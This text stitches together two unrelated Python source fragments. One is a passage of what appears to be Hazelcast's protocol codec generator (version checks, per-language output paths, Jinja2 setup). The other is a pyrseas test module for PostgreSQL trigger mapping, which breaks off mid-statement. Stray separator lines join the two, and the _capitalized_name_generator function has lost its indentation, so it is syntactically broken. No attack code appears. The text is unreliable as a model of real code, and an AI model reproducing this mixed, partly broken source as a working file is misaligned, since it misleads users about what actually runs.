            "not semantically follow other protocol versions!" % (method_or_event_name, since)
        )
        is_semantically_correct = False
    for param in params:
        param_version = get_version_as_number(param["since"])
        if not is_semantically_correct_param(param_version, protocol_versions):
            print(
                'Check the since value of "%s" field of the "%s".\n'
                'It is set version "%s" but this protocol version does '
                "not semantically follow other protocol versions!"
                % (param["name"], name, param["since"])
            )
            is_semantically_correct = False
        if version > param_version:
            print(
                'Check the since value of "%s" field of the "%s".\n'
                "Parameters should be in the increasing order of since values!"
                % (param["name"], name)
            )
            is_ordered = False
        # Subsequent params must not be older than this one.
        version = param_version
    return is_ordered and is_semantically_correct
def validate_custom_protocol_definitions(definition, schema_path, protocol_versions):
    """Validate the custom-types document against its JSON schema and check the
    parameter ordering / version semantics of every custom type."""
    with open(schema_path, "r") as schema_file:
        schema = json.load(schema_file)
    custom_types = definition[0]
    if not validate_against_schema(custom_types, schema):
        return False
    valid = True
    for custom_type in custom_types["customTypes"]:
        params = custom_type.get("params", [])
        ok = is_parameters_ordered_and_semantically_correct(
            custom_type["since"], "CustomTypes#" + custom_type["name"], params, protocol_versions
        )
        valid = valid and ok
    return valid
def validate_against_schema(service, schema):
    """True if the document conforms to the JSON schema; prints the error otherwise."""
    try:
        jsonschema.validate(service, schema)
        return True
    except jsonschema.ValidationError as e:
        print("Validation error on %s: %s" % (service.get("name", None), e))
        return False
def save_file(file, content, mode="w"):
    """Write `content` to `file`, substituting the "!codec_hash!" placeholder
    with the MD5 hex digest of the pre-substitution content.

    mode: "w" to overwrite, "a+" to append (used for the C++ monolithic codecs).
    """
    codec_hash = hashlib.md5(content.encode("utf-8")).hexdigest()
    # Fixed: the output handle shadowed the `file` parameter, and writelines()
    # iterated the string character by character; write() emits it in one call.
    with open(file, mode, newline="\n") as out:
        out.write(content.replace("!codec_hash!", codec_hash))
def get_protocol_versions(protocol_defs, custom_codec_defs):
    """Collect every distinct "since" version mentioned across the protocol and
    custom-codec definitions; returns an iterator of version strings."""
    versions = set()

    def note(entity):
        # Every method/param/event/codec carries a "since" version.
        versions.add(entity["since"])

    for service in protocol_defs:
        for method in service["methods"]:
            note(method)
            for param in method["request"].get("params", []):
                note(param)
            for param in method["response"].get("params", []):
                note(param)
            for event in method.get("events", []):
                note(event)
                for param in event.get("params", []):
                    note(param)
    codecs = custom_codec_defs[0]["customTypes"] if custom_codec_defs else []
    for codec in codecs:
        note(codec)
        for param in codec.get("params", []):
            note(param)
    return map(str, versions)
class SupportedLanguages(Enum):
    """Codec-generation targets; the value is the template package name."""
    JAVA = "java"
    CPP = "cpp"
    CS = "cs"
    PY = "py"
    TS = "ts"
    # GO = 'go'  # Go generation is currently disabled throughout this module.
    MD = "md"  # not a client language: renders the protocol documentation
# Per-language destination (relative to each client repository's root) for the
# generated method codecs.
codec_output_directories = {
    SupportedLanguages.JAVA: "hazelcast/src/main/java/com/hazelcast/client/impl/protocol/codec/",
    SupportedLanguages.CPP: "hazelcast/generated-sources/src/hazelcast/client/protocol/codec/",
    SupportedLanguages.CS: "src/Hazelcast.Net/Protocol/Codecs/",
    SupportedLanguages.PY: "hazelcast/protocol/codec/",
    SupportedLanguages.TS: "src/codec/",
    # SupportedLanguages.GO: 'internal/proto/'
    SupportedLanguages.MD: "documentation",
}
# Per-language destination for the generated custom-type codecs (C++ shares the
# method-codec directory; MD has no custom-codec output).
custom_codec_output_directories = {
    SupportedLanguages.JAVA: "hazelcast/src/main/java/com/hazelcast/client/impl/protocol/codec/custom/",
    SupportedLanguages.CPP: "hazelcast/generated-sources/src/hazelcast/client/protocol/codec/",
    SupportedLanguages.CS: "src/Hazelcast.Net/Protocol/CustomCodecs/",
    SupportedLanguages.PY: "hazelcast/protocol/codec/custom/",
    SupportedLanguages.TS: "src/codec/custom",
    # SupportedLanguages.GO: 'internal/proto/'
}
def _capitalized_name_generator(extension):
def inner(*names):
return "%sCodec.%s" % ("".join(map(capital, names)), extension)
return inner
def _snake_cased_name_generator(extension):
    """Build a file-name function producing snake_case names,
    e.g. ("map", "put") -> "map_put_codec.<extension>"."""
    def inner(*names):
        snake = "_".join(py_param_name(n) for n in names)
        return "%s_codec.%s" % (snake, extension)
    return inner
# How each language names a generated codec file.
# NOTE(review): the MD entry is the bare string "md", not a callable like the
# others — presumably file_name_generators is never invoked for MD; confirm.
file_name_generators = {
    SupportedLanguages.JAVA: _capitalized_name_generator("java"),
    SupportedLanguages.CPP: _snake_cased_name_generator("cpp"),
    SupportedLanguages.CS: _capitalized_name_generator("cs"),
    SupportedLanguages.PY: _snake_cased_name_generator("py"),
    SupportedLanguages.TS: _capitalized_name_generator("ts"),
    # SupportedLanguages.GO: 'go'
    SupportedLanguages.MD: "md",
}
# Per-language hooks injected into the Jinja2 environment by create_environment().
# MD uses identity functions since it only documents the protocol.
language_specific_funcs = {
    "lang_types_encode": {
        SupportedLanguages.JAVA: java_types_encode,
        SupportedLanguages.CS: cs_types_encode,
        SupportedLanguages.CPP: cpp_types_encode,
        SupportedLanguages.TS: ts_types_encode,
        SupportedLanguages.PY: py_types_encode_decode,
        SupportedLanguages.MD: lambda x: x,
    },
    "lang_types_decode": {
        SupportedLanguages.JAVA: java_types_decode,
        SupportedLanguages.CS: cs_types_decode,
        SupportedLanguages.CPP: cpp_types_decode,
        SupportedLanguages.TS: ts_types_decode,
        SupportedLanguages.PY: py_types_encode_decode,
        SupportedLanguages.MD: lambda x: x,
    },
    "lang_name": {
        SupportedLanguages.JAVA: java_name,
        SupportedLanguages.CS: cs_name,
        SupportedLanguages.CPP: cpp_name,
        SupportedLanguages.TS: java_name,
        SupportedLanguages.PY: java_name,
        SupportedLanguages.MD: lambda x: x,
    },
    "param_name": {
        SupportedLanguages.JAVA: param_name,
        SupportedLanguages.CS: param_name,
        SupportedLanguages.CPP: param_name,
        SupportedLanguages.TS: param_name,
        SupportedLanguages.PY: py_param_name,
        SupportedLanguages.MD: lambda x: x,
    },
    "escape_keyword": {
        SupportedLanguages.JAVA: lambda x: x,
        SupportedLanguages.CS: cs_escape_keyword,
        SupportedLanguages.CPP: lambda x: x,
        SupportedLanguages.TS: ts_escape_keyword,
        SupportedLanguages.PY: py_escape_keyword,
        SupportedLanguages.MD: lambda x: x,
    },
    "get_import_path_holders": {
        SupportedLanguages.JAVA: lambda x: x,
        SupportedLanguages.CS: lambda x: x,
        SupportedLanguages.CPP: lambda x: x,
        SupportedLanguages.TS: ts_get_import_path_holders,
        SupportedLanguages.PY: py_get_import_path_holders,
        SupportedLanguages.MD: lambda x: x,
    },
}
# Services/methods each language skips entirely (see generate_codecs).
language_service_ignore_list = {
    SupportedLanguages.JAVA: set(),
    SupportedLanguages.CPP: cpp_ignore_service_list,
    SupportedLanguages.CS: cs_ignore_service_list,
    SupportedLanguages.PY: py_ignore_service_list,
    SupportedLanguages.TS: ts_ignore_service_list,
    # SupportedLanguages.GO: set()
}
def create_environment(lang, namespace):
    """Build the Jinja2 environment for a target language: template loader,
    whitespace control, shared helper globals, and the per-language hooks
    selected from language_specific_funcs."""
    env = Environment(
        loader=PackageLoader(lang.value, "."),
        extensions=["jinja2.ext.do", "jinja2.ext.loopcontrols"],
    )
    env.trim_blocks = True
    env.lstrip_blocks = True
    env.keep_trailing_newline = False
    env.filters["capital"] = capital
    # Helpers shared by every language's templates.
    env.globals.update({
        "to_upper_snake_case": to_upper_snake_case,
        "fixed_params": fixed_params,
        "var_size_params": var_size_params,
        "new_params": new_params,
        "filter_new_params": filter_new_params,
        "is_var_sized_list": is_var_sized_list,
        "is_var_sized_list_contains_nullable": is_var_sized_list_contains_nullable,
        "is_var_sized_entry_list": is_var_sized_entry_list,
        "is_var_sized_map": is_var_sized_map,
        "item_type": item_type,
        "key_type": key_type,
        "value_type": value_type,
        "namespace": namespace,
        "get_size": get_size,
        "is_trivial": is_trivial,
    })
    # Language-specific hooks resolved from the dispatch tables.
    for hook in ("lang_types_encode", "lang_types_decode", "lang_name",
                 "param_name", "escape_keyword", "get_import_path_holders"):
        env.globals[hook] = language_specific_funcs[hook][lang]
    return env
|
|
# -*- coding: utf-8 -*-
"""Test triggers"""
import pytest
from pyrseas.testutils import DatabaseToMapTestCase
from pyrseas.testutils import InputMapToSqlTestCase, fix_indent
# plpgsql trigger function bodies used throughout these tests.
FUNC_SRC = "BEGIN NEW.c3 := CURRENT_DATE; RETURN NEW; END"
# Body for the INSTEAD OF trigger test: redirect a view insert into t1.
FUNC_INSTEAD_SRC = "BEGIN INSERT INTO t1 VALUES (NEW.c1, NEW.c2, now()); " \
    "RETURN NULL; END"
# Base table (schema-qualified "sd" variant, and an unqualified tsvector variant).
CREATE_TABLE_STMT = "CREATE TABLE sd.t1 (c1 integer, c2 text, " \
    "c3 date)"
CREATE_TABLE_STMT2 = "CREATE TABLE t1 (c1 integer, c2 text, " \
    "c3 text, tsidx tsvector)"
CREATE_FUNC_STMT = "CREATE FUNCTION sd.f1() RETURNS trigger LANGUAGE plpgsql" \
    " AS $_$%s$_$" % FUNC_SRC
# The canonical trigger most tests create and inspect.
CREATE_STMT = "CREATE TRIGGER tr1 BEFORE INSERT OR UPDATE ON sd.t1 " \
    "FOR EACH ROW EXECUTE PROCEDURE sd.f1()"
COMMENT_STMT = "COMMENT ON TRIGGER tr1 ON sd.t1 IS 'Test trigger tr1'"
class TriggerToMapTestCase(DatabaseToMapTestCase):
    """Test mapping of existing triggers.

    Each test runs the given SQL against a live database via to_map() —
    presumably provided by DatabaseToMapTestCase — and checks the resulting
    YAML/dict representation of the trigger.
    """

    def test_map_trigger1(self):
        "Map a simple trigger"
        stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT, CREATE_STMT]
        dbmap = self.to_map(stmts)
        assert dbmap['schema sd']['table t1']['triggers'] == {
            'tr1': {'timing': 'before', 'events': ['insert', 'update'],
                    'level': 'row', 'procedure': 'sd.f1'}}

    def test_map_trigger2(self):
        "Map another simple trigger with different attributes"
        # No FOR EACH ROW clause: defaults to statement level.
        stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT,
                 "CREATE TRIGGER tr1 AFTER DELETE OR TRUNCATE ON t1 "
                 "EXECUTE PROCEDURE f1()"]
        dbmap = self.to_map(stmts)
        assert dbmap['schema sd']['table t1']['triggers'] == {
            'tr1': {'timing': 'after', 'events': ['delete', 'truncate'],
                    'level': 'statement', 'procedure': 'sd.f1'}}

    def test_map_trigger_update_cols(self):
        "Map trigger with UPDATE OF columns"
        stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT,
                 "CREATE TRIGGER tr1 AFTER INSERT OR UPDATE OF c1, c2 ON t1 "
                 "FOR EACH ROW EXECUTE PROCEDURE f1()"]
        dbmap = self.to_map(stmts)
        assert dbmap['schema sd']['table t1']['triggers'] == {
            'tr1': {'timing': 'after', 'events': ['insert', 'update'],
                    'columns': ['c1', 'c2'], 'level': 'row',
                    'procedure': 'sd.f1'}}

    def test_map_trigger_conditional(self):
        "Map trigger with a WHEN qualification"
        # The condition comes back normalized (lower-cased refs, parenthesized).
        stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT,
                 "CREATE TRIGGER tr1 AFTER UPDATE ON t1 FOR EACH ROW "
                 "WHEN (OLD.c2 IS DISTINCT FROM NEW.c2) "
                 "EXECUTE PROCEDURE f1()"]
        dbmap = self.to_map(stmts)
        assert dbmap['schema sd']['table t1']['triggers'] == {
            'tr1': {'timing': 'after', 'events': ['update'],
                    'level': 'row', 'procedure': 'sd.f1',
                    'condition': '(old.c2 IS DISTINCT FROM new.c2)'}}

    def test_map_trigger_instead(self):
        "Map an INSTEAD OF trigger"
        # INSTEAD OF triggers attach to views, so the mapping lands under 'view v1'.
        stmts = [CREATE_TABLE_STMT, "CREATE VIEW v1 AS SELECT c1, c2 FROM t1",
                 "CREATE FUNCTION f1() RETURNS trigger LANGUAGE plpgsql AS "
                 "$_$%s$_$" % FUNC_INSTEAD_SRC,
                 "CREATE TRIGGER tr1 INSTEAD OF INSERT ON v1 "
                 "FOR EACH ROW EXECUTE PROCEDURE f1()"]
        dbmap = self.to_map(stmts)
        assert dbmap['schema sd']['view v1']['triggers'] == {
            'tr1': {'timing': 'instead of', 'events': ['insert'],
                    'level': 'row', 'procedure': 'sd.f1'}}

    def test_map_tsvector_trigger(self):
        "Map a text search (tsvector) trigger"
        # Built-in procedure with arguments: mapped as a name/arguments dict
        # rather than a plain procedure string.
        stmts = [
            CREATE_TABLE_STMT2,
            "CREATE TRIGGER tr1 BEFORE INSERT OR UPDATE ON sd.t1 "
            "FOR EACH ROW EXECUTE PROCEDURE "
            "tsvector_update_trigger('tsidx', 'pg_catalog.english', 'c2')"]
        dbmap = self.to_map(stmts)
        assert dbmap['schema sd']['table t1']['triggers'] == {
            'tr1': {'timing': 'before', 'events': ['insert', 'update'],
                    'level': 'row',
                    'procedure': {'name': 'tsvector_update_trigger',
                                  'arguments':
                                  "'tsidx', 'pg_catalog.english', 'c2'"}}}

    def test_map_trigger_function_distinct_schemas(self):
        "Map a trigger in a non-default schema with function in different one"
        stmts = ["CREATE SCHEMA s1", "CREATE TABLE s1.t1 (c1 integer, "
                 "c2 text, c3 date)", "CREATE SCHEMA s2",
                 "CREATE FUNCTION s2.f1() RETURNS trigger LANGUAGE plpgsql AS "
                 "$_$%s$_$" % FUNC_SRC,
                 "CREATE TRIGGER tr1 BEFORE INSERT OR UPDATE ON s1.t1 "
                 "FOR EACH ROW EXECUTE PROCEDURE s2.f1()"]
        dbmap = self.to_map(stmts)
        assert dbmap['schema s1']['table t1']['triggers'] == {
            'tr1': {'timing': 'before', 'events': ['insert', 'update'],
                    'level': 'row', 'procedure': 's2.f1'}}

    def test_map_trigger_comment(self):
        "Map a trigger comment"
        stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT, CREATE_STMT,
                 COMMENT_STMT]
        dbmap = self.to_map(stmts)
        assert dbmap['schema sd']['table t1']['triggers']['tr1'][
            'description'] == 'Test trigger tr1'
class ConstraintTriggerToMapTestCase(DatabaseToMapTestCase):
    """Test mapping of existing constraint triggers"""
    def test_map_trigger(self):
        "Map a simple constraint trigger"
        create_trigger = (
            "CREATE CONSTRAINT TRIGGER tr1 AFTER INSERT OR UPDATE ON t1 "
            "FOR EACH ROW EXECUTE PROCEDURE f1()")
        dbmap = self.to_map([CREATE_TABLE_STMT, CREATE_FUNC_STMT,
                             create_trigger])
        # The CONSTRAINT keyword surfaces as a boolean 'constraint' flag.
        expected = {'tr1': {'constraint': True, 'timing': 'after',
                            'events': ['insert', 'update'], 'level': 'row',
                            'procedure': 'sd.f1'}}
        assert dbmap['schema sd']['table t1']['triggers'] == expected
    def test_map_trigger_deferrable(self):
        "Map a deferrable, initially deferred constraint trigger"
        create_trigger = (
            "CREATE CONSTRAINT TRIGGER tr1 AFTER INSERT OR UPDATE ON t1 "
            "DEFERRABLE INITIALLY DEFERRED "
            "FOR EACH ROW EXECUTE PROCEDURE f1()")
        dbmap = self.to_map([CREATE_TABLE_STMT, CREATE_FUNC_STMT,
                             create_trigger])
        # DEFERRABLE and INITIALLY DEFERRED each map to their own flag.
        expected = {'tr1': {'constraint': True, 'deferrable': True,
                            'initially_deferred': True, 'timing': 'after',
                            'events': ['insert', 'update'], 'level': 'row',
                            'procedure': 'sd.f1'}}
        assert dbmap['schema sd']['table t1']['triggers'] == expected
class TriggerToSqlTestCase(InputMapToSqlTestCase):
    """Test SQL generation from input triggers"""
    # Each test builds an input map (inmap) and compares the SQL emitted by
    # self.to_sql against the expected CREATE/DROP/COMMENT statements.
    def test_create_trigger1(self):
        "Create a simple trigger"
        inmap = self.std_map(plpgsql_installed=True)
        inmap['schema sd'].update({'function f1()': {
            'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
        inmap['schema sd'].update({'table t1': {
            'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
                        {'c3': {'type': 'date'}}],
            'triggers': {'tr1': {
                'timing': 'before', 'events': ['insert', 'update'],
                'level': 'row', 'procedure': 'sd.f1'}}}})
        sql = self.to_sql(inmap)
        # The CREATE TABLE and CREATE FUNCTION statements may be emitted in
        # either order, so detect which came first.
        crt0, crt1 = (0, 1) if 'TABLE' in sql[0] else (1, 0)
        assert fix_indent(sql[crt0]) == CREATE_TABLE_STMT
        assert fix_indent(sql[crt1]) == CREATE_FUNC_STMT
        assert fix_indent(sql[2]) == CREATE_STMT
    def test_create_trigger2(self):
        "Create another simple trigger with different attributes"
        inmap = self.std_map(plpgsql_installed=True)
        inmap['schema sd'].update({'function f1()': {
            'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
        inmap['schema sd'].update({'table t1': {
            'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
                        {'c3': {'type': 'date'}}],
            'triggers': {'tr1': {'timing': 'after',
                                 'events': ['delete', 'truncate'],
                                 'procedure': 'sd.f1'}}}})
        sql = self.to_sql(inmap)
        crt0, crt1 = (0, 1) if 'TABLE' in sql[0] else (1, 0)
        assert fix_indent(sql[crt0]) == CREATE_TABLE_STMT
        assert fix_indent(sql[crt1]) == CREATE_FUNC_STMT
        # No 'level' given: the generated trigger is FOR EACH STATEMENT.
        assert fix_indent(sql[2]) == "CREATE TRIGGER tr1 AFTER DELETE OR " \
            "TRUNCATE ON sd.t1 FOR EACH STATEMENT EXECUTE PROCEDURE sd.f1()"
    def test_create_trigger_update_cols(self):
        "Create a trigger with UPDATE OF columns"
        inmap = self.std_map()
        inmap['schema sd'].update({'function f1()': {
            'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
        inmap['schema sd'].update({'table t1': {
            'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
                        {'c3': {'type': 'date'}}],
            'triggers': {'tr1': {'timing': 'before', 'events': [
                'insert', 'update'], 'columns': ['c1', 'c2'], 'level': 'row',
                'procedure': 'sd.f1'}}}})
        sql = self.to_sql(inmap)
        crt0, crt1 = (0, 1) if 'TABLE' in sql[0] else (1, 0)
        assert fix_indent(sql[crt0]) == CREATE_TABLE_STMT
        assert fix_indent(sql[crt1]) == CREATE_FUNC_STMT
        assert fix_indent(sql[2]) == "CREATE TRIGGER tr1 BEFORE INSERT OR " \
            "UPDATE OF c1, c2 ON sd.t1 FOR EACH ROW EXECUTE PROCEDURE sd.f1()"
    def test_create_trigger_conditional(self):
        "Create a trigger with a WHEN qualification"
        inmap = self.std_map()
        inmap['schema sd'].update({'function f1()': {
            'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
        inmap['schema sd'].update({'table t1': {
            'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
                        {'c3': {'type': 'date'}}],
            'triggers': {'tr1': {'timing': 'before', 'events': [
                'update'], 'level': 'row', 'procedure': 'sd.f1',
                'condition': '(old.c2 IS DISTINCT FROM new.c2)'}}}})
        sql = self.to_sql(inmap)
        crt0, crt1 = (0, 1) if 'TABLE' in sql[0] else (1, 0)
        assert fix_indent(sql[crt0]) == CREATE_TABLE_STMT
        assert fix_indent(sql[crt1]) == CREATE_FUNC_STMT
        # Note the doubled parentheses around the WHEN condition.
        assert fix_indent(sql[2]) == "CREATE TRIGGER tr1 BEFORE UPDATE " \
            "ON sd.t1 FOR EACH ROW WHEN ((old.c2 IS DISTINCT FROM new.c2)) " \
            "EXECUTE PROCEDURE sd.f1()"
    def test_create_trigger_instead(self):
        "Create an INSTEAD OF trigger"
        inmap = self.std_map(plpgsql_installed=True)
        inmap['schema sd'].update({'function f1()': {
            'language': 'plpgsql', 'returns': 'trigger',
            'source': FUNC_INSTEAD_SRC}})
        inmap['schema sd'].update({'table t1': {
            'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
                        {'c3': {'type': 'date'}}]},
            'view v1': {'definition': "SELECT c1, c2 FROM t1",
                        'triggers': {'tr1': {'timing': 'instead of',
                                             'events': ['insert'],
                                             'level': 'row',
                                             'procedure': 'sd.f1'}}}})
        sql = self.to_sql(inmap)
        assert fix_indent(sql[0]) == CREATE_TABLE_STMT
        # The view and function may be created in either order.
        cr1, cr2 = (1, 2) if 'VIEW' in sql[1] else (2, 1)
        assert fix_indent(sql[cr1]) == \
            "CREATE VIEW sd.v1 AS SELECT c1, c2 FROM t1"
        assert fix_indent(sql[cr2]) == "CREATE FUNCTION sd.f1() RETURNS " \
            "trigger LANGUAGE plpgsql AS $_$%s$_$" % FUNC_INSTEAD_SRC
        assert fix_indent(sql[3]) == "CREATE TRIGGER tr1 INSTEAD OF INSERT " \
            "ON sd.v1 FOR EACH ROW EXECUTE PROCEDURE sd.f1()"
    def test_add_tsvector_trigger(self):
        "Add a text search (tsvector) trigger"
        inmap = self.std_map()
        inmap['schema sd'].update({'table t1': {
            'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
                        {'c3': {'type': 'text'}},
                        {'tsidx': {'type': 'tsvector'}}],
            'triggers': {'t1_tsidx_update': {
                'timing': 'before',
                'events': ['insert', 'update'], 'level': 'row',
                'procedure': {'name': 'tsvector_update_trigger',
                              'arguments':
                              "'tsidx', 'pg_catalog.english', 'c2'"}}}}})
        sql = self.to_sql(inmap, [CREATE_TABLE_STMT2])
        assert fix_indent(sql[0]) == "CREATE TRIGGER t1_tsidx_update BEFORE" \
            " INSERT OR UPDATE ON sd.t1 FOR EACH ROW EXECUTE PROCEDURE " \
            "tsvector_update_trigger('tsidx', 'pg_catalog.english', 'c2')"
    def test_change_tsvector_trigger(self):
        "Change a text search (tsvector) trigger"
        inmap = self.std_map()
        inmap['schema sd'].update({'table t1': {
            'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
                        {'c3': {'type': 'text'}},
                        {'tsidx': {'type': 'tsvector'}}],
            'triggers': {'t1_tsidx_update': {
                'timing': 'before', 'events': ['insert', 'update'],
                'level': 'row',
                'procedure': {'name': "tsvector_update_trigger",
                              'arguments':
                              "'tsidx', 'pg_catalog.english', 'c2', 'c3'"}}}}})
        stmts = [CREATE_TABLE_STMT2,
                 "CREATE TRIGGER t1_tsidx_update BEFORE INSERT OR UPDATE ON "
                 "t1 FOR EACH ROW EXECUTE PROCEDURE tsvector_update_trigger"
                 "('tsidx', 'pg_catalog.english', 'c2')"]
        sql = self.to_sql(inmap, stmts)
        # Changing the procedure arguments requires a DROP and re-CREATE.
        assert sql[0] == "DROP TRIGGER t1_tsidx_update ON sd.t1"
        assert fix_indent(sql[1]) == "CREATE TRIGGER t1_tsidx_update BEFORE" \
            " INSERT OR UPDATE ON sd.t1 FOR EACH ROW EXECUTE PROCEDURE " \
            "tsvector_update_trigger('tsidx', 'pg_catalog.english', " \
            "'c2', 'c3')"
    def test_create_trigger_function_distinct_schemas(self):
        "Create a trigger in non-default schema with function in different one"
        inmap = self.std_map(plpgsql_installed=True)
        inmap.update({'schema s2': {'function f1()': {
            'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}},
            'schema s1': {
                'table t1': {
                    'columns': [
                        {'c1': {'type': 'integer'}},
                        {'c2': {'type': 'text'}},
                        {'c3': {'type': 'date'}}],
                    'triggers': {'tr1': {
                        'timing': 'before',
                        'events': ['insert', 'update'],
                        'level': 'row', 'procedure': 's2.f1'}}}}})
        sql = self.to_sql(inmap, ["CREATE SCHEMA s1", "CREATE SCHEMA s2"])
        assert fix_indent(sql[2]) == "CREATE TRIGGER tr1 BEFORE INSERT OR " \
            "UPDATE ON s1.t1 FOR EACH ROW EXECUTE PROCEDURE s2.f1()"
    def test_drop_trigger(self):
        "Drop an existing trigger"
        stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT, CREATE_STMT]
        inmap = self.std_map(plpgsql_installed=True)
        inmap['schema sd'].update({'function f1()': {
            'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
        # The input map keeps the table but omits the trigger, so only a
        # DROP TRIGGER should be generated.
        inmap['schema sd'].update({'table t1': {
            'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
                        {'c3': {'type': 'date'}}]}})
        sql = self.to_sql(inmap, stmts)
        assert sql == ["DROP TRIGGER tr1 ON sd.t1"]
    def test_drop_trigger_table(self):
        "Drop an existing trigger and the related table"
        stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT, CREATE_STMT]
        inmap = self.std_map(plpgsql_installed=True)
        inmap['schema sd'].update({'function f1()': {
            'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
        sql = self.to_sql(inmap, stmts)
        # The trigger must be dropped before its table.
        assert sql[0] == "DROP TRIGGER tr1 ON sd.t1"
        assert sql[1] == "DROP TABLE sd.t1"
    def test_trigger_with_comment(self):
        "Create a trigger with a comment"
        inmap = self.std_map(plpgsql_installed=True)
        inmap['schema sd'].update({'function f1()': {
            'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
        inmap['schema sd'].update({'table t1': {
            'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
                        {'c3': {'type': 'date'}}],
            'triggers': {'tr1': {
                'description': 'Test trigger tr1',
                'timing': 'before', 'events': ['insert', 'update'],
                'level': 'row', 'procedure': 'sd.f1'}}}})
        sql = self.to_sql(inmap)
        crt0, crt1 = (0, 1) if 'TABLE' in sql[0] else (1, 0)
        assert fix_indent(sql[crt0]) == CREATE_TABLE_STMT
        assert fix_indent(sql[crt1]) == CREATE_FUNC_STMT
        assert fix_indent(sql[2]) == CREATE_STMT
        assert sql[3] == COMMENT_STMT
    def test_comment_on_trigger(self):
        "Create a comment on an existing trigger"
        stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT, CREATE_STMT]
        inmap = self.std_map(plpgsql_installed=True)
        inmap['schema sd'].update({'function f1()': {
            'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
        inmap['schema sd'].update({'table t1': {
            'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
                        {'c3': {'type': 'date'}}],
            'triggers': {'tr1': {
                'description': 'Test trigger tr1',
                'timing': 'before', 'events': ['insert', 'update'],
                'level': 'row', 'procedure': 'sd.f1'}}}})
        sql = self.to_sql(inmap, stmts)
        # Everything but the new description already exists: only COMMENT.
        assert sql == [COMMENT_STMT]
    def test_drop_trigger_comment(self):
        "Drop a comment on an existing trigger"
        stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT, CREATE_STMT,
                 COMMENT_STMT]
        inmap = self.std_map(plpgsql_installed=True)
        inmap['schema sd'].update({'function f1()': {
            'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
        inmap['schema sd'].update({'table t1': {
            'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
                        {'c3': {'type': 'date'}}],
            'triggers': {'tr1': {
                'timing': 'before', 'events': ['insert', 'update'],
                'level': 'row', 'procedure': 'sd.f1'}}}})
        sql = self.to_sql(inmap, stmts)
        # A comment is removed by setting it to NULL.
        assert sql == ["COMMENT ON TRIGGER tr1 ON sd.t1 IS NULL"]
    def test_change_trigger_comment(self):
        "Change existing comment on a trigger"
        stmts = [CREATE_TABLE_STMT, CREATE_FUNC_STMT, CREATE_STMT,
                 COMMENT_STMT]
        inmap = self.std_map(plpgsql_installed=True)
        inmap['schema sd'].update({'function f1()': {
            'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
        inmap['schema sd'].update({'table t1': {
            'columns': [{'c1': {'type': 'integer'}}, {'c2': {'type': 'text'}},
                        {'c3': {'type': 'date'}}],
            'triggers': {'tr1': {
                'description': 'Changed trigger tr1',
                'timing': 'before', 'events': ['insert', 'update'],
                'level': 'row', 'procedure': 'sd.f1'}}}})
        sql = self.to_sql(inmap, stmts)
        assert sql == [
            "COMMENT ON TRIGGER tr1 ON sd.t1 IS 'Changed trigger tr1'"]
class ConstraintTriggerToSqlTestCase(InputMapToSqlTestCase):
    """Test SQL generation from input constraint triggers"""
    def _input_map(self, trigger_attrs):
        # Build the standard input map with the plpgsql function f1(),
        # table t1, and the given attributes for trigger tr1.
        inmap = self.std_map(plpgsql_installed=True)
        inmap['schema sd'].update({'function f1()': {
            'language': 'plpgsql', 'returns': 'trigger', 'source': FUNC_SRC}})
        inmap['schema sd'].update({'table t1': {
            'columns': [{'c1': {'type': 'integer'}},
                        {'c2': {'type': 'text'}},
                        {'c3': {'type': 'date'}}],
            'triggers': {'tr1': trigger_attrs}}})
        return inmap
    def test_create_trigger(self):
        "Create a constraint trigger"
        inmap = self._input_map({
            'constraint': True, 'timing': 'after',
            'events': ['insert', 'update'], 'level': 'row',
            'procedure': 'sd.f1'})
        sql = self.to_sql(inmap)
        # Table/function creation order is not deterministic.
        crt0, crt1 = (0, 1) if 'TABLE' in sql[0] else (1, 0)
        assert fix_indent(sql[crt0]) == CREATE_TABLE_STMT
        assert fix_indent(sql[crt1]) == CREATE_FUNC_STMT
        assert fix_indent(sql[2]) == "CREATE CONSTRAINT TRIGGER tr1 AFTER " \
            "INSERT OR UPDATE ON sd.t1 FOR EACH ROW EXECUTE PROCEDURE sd.f1()"
    def test_create_trigger_deferrable(self):
        "Create a deferrable constraint trigger"
        inmap = self._input_map({
            'constraint': True, 'deferrable': True,
            'initially_deferred': True, 'timing': 'after',
            'events': ['insert', 'update'], 'level': 'row',
            'procedure': 'sd.f1'})
        sql = self.to_sql(inmap)
        crt0, crt1 = (0, 1) if 'TABLE' in sql[0] else (1, 0)
        assert fix_indent(sql[crt0]) == CREATE_TABLE_STMT
        assert fix_indent(sql[crt1]) == CREATE_FUNC_STMT
        assert fix_indent(sql[2]) == "CREATE CONSTRAINT TRIGGER tr1 " \
            "AFTER INSERT OR UPDATE ON sd.t1 DEFERRABLE INITIALLY " \
